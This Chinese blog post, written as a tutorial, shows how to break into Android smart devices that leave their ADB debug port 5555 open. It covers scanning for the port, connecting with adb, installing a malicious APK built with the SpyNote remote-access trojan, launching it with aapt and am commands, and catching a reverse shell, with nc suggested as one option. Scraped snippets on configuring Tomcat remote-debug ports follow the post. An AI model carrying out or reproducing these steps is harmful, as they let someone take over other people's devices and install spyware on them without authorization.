快速渗透(二):通过智能设备远程调试端口进行渗透

1、很多智能设备,如:天猫盒子,手机等,在出厂不安全配置的情况下,容易出现调试端口对外暴露,甚至允许远程调试的情况,这种情况下,我们就可以通过adb远程调试,安装木马并使之运行。很多智能设备都是以安卓作为操作系统,这里只描述安卓智能设备的渗透方法。

2、安卓设备的调试端口一般开放在5555端口中,我们可以快速在网络中扫描5555端口的开放状态

3、找到开发5555端口的ip,用adb进行远程连接

adb connect x.x.x.x

4、可以使用spynote生成一个恶意apk,当然能手写也可以,然后用adb进行安装

adb install xxx.apk

5、用aapt查看包名和MainActivity名,下一步触发恶意应用要用到

aapt dump badging xxx.apk|grep package       #取name字段
aapt dump badging xxx.apk|grep activity      #取name字段

6、使用am命令触发该应用

am start -n 包名/activity名

7、等待接收反向shell,SpyNote会稍微方便点,现在最新版为4.0,可以免费下载到,自己写的,nc之类的自己想办法就好了

时间: 2024-10-20 22:40:22

快速渗透(二):通过智能设备远程调试端口进行渗透的相关文章

tomcat开发远程调试端口以及利用eclipse进行远程调试

一.tomcat开发远程调试端口 方法1 WIN系统 在catalina.bat里:  SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8899 Linux系统 在catalina.sh里:  CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compile

tomcat的优化和远程调试端口添加

1.在TOMCATHOME/bin/catalina.sh开始添加: JAVA_OPTS="$JAVA_OPTS -server -Xms768m -Xmx1024m -XX:PermSize=128M -XX:MaxPermSize=256m" JAVA_OPTS="$JAVA_OPTS -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/tmp/21520.hprof" 远程调试端口 21525 线上请不要添加调试

Tomcat配置远程调试端口(windows、Linux)

当我们需要定位生产环境问题,而日志又不清晰的情况下,我们可以借助Tomcat提供的远程调试,设置如下: // Linxu系统: apach/bin/startup.sh开始处中增加如下内容: declare -x CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8081" // Windows系统:

tomcat7配置远程调试端口

1.修改tomcat配置文件 WIN系统,在catalina.bat里: SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8787 Linux系统,在catalina.sh里: CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -

Tomcat配置远程调试端口

1.Linxu系统: apach/bin/startup.sh开始处中增加如下内容: Java代码   declare -x CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788" 2.Windows系统: apach/bin/startup.bat开始处中增加如下内容: Java代码   SE

Linux下Debug模式启动Tomcat进行远程调试

J2EE开发各类资源下载清单,  史上最全IT资源,点击进入! 一.      应用场景 在实际的测试过程中,可能会遇到由于程序执行的不间断性,我们无法构造测试场景来验证某个功能的正确性,只有通过代码级的调试才能验证功能是否正确.然而开发本地调试的话,不具有说服力,这时我们测试人员必须连接到linux下的基线版本代码进行远程调试 二.调试步骤 1.部署服务工程到Linux系统下的Tomcat中,本文档重点是远程调式,为了防止文档篇幅累赘,这里就不介绍部署工程了. 2.更改tomcat远程调试端口

MyEclipse远程调试Tomcat

程序就是这么一个神奇的东西,有时你的一个项目,在本机上运行得还是好好的,可当你把这货放到了服务器上,同样的条件就是结果不一样.于是就灰常想看一下程序在远程运行时候的状态,希望让程序在远程运行,还可以在本机打断点跟一下,这就用到了用eclipse远程调试Tomcat.记得以前好久之前研究了一下,怎么也没弄成功.最近终于OK啦. 一.调试准备 首先得有一个在远程服务器上的Tomcat与一个在本地的Eclipse,还有就是一个已经部署在远程Tomcat上并且源代码在本地Eclipse上的程序.当然如果

远程调试部署在Tomcat中的应用服务(2种配置方式)

远程调试部署在Tomcat中的应用服务(tomcat 远程debug 配置文件) 方法一(编辑catalina.bat) 1. D:\iVMS_Platform\bin\apps\ivms6-liteTomcat\bin   编辑catalina.bat文件 set "JAVA_OPTS=%JAVA_OPTS% %LOGGING_CONFIG%" 替换成这样: set "JAVA_OPTS=%JAVA_OPTS% %LOGGING_CONFIG%  -Xdebug -Xrun

远程调试tomcat

程序就是这么一个神奇的东西,有时你的一个项目,在本机上运行得还是好好的,可当你把这货放到了服务器上,同样的条件就是结果不一样.于是就灰常想看一下程序在远程运行时候的状态,希望让程序在远程运行,还可以在本机打断点跟一下,这就用到了用eclipse远程调试Tomcat.记得以前好久之前研究了一下,怎么也没弄成功.最近终于OK啦. 一.调试准备 首先得有一个在远程服务器上的Tomcat与一个在本地的Eclipse,还有就是一个已经部署在远程Tomcat上并且源代码在本地Eclipse上的程序.当然如果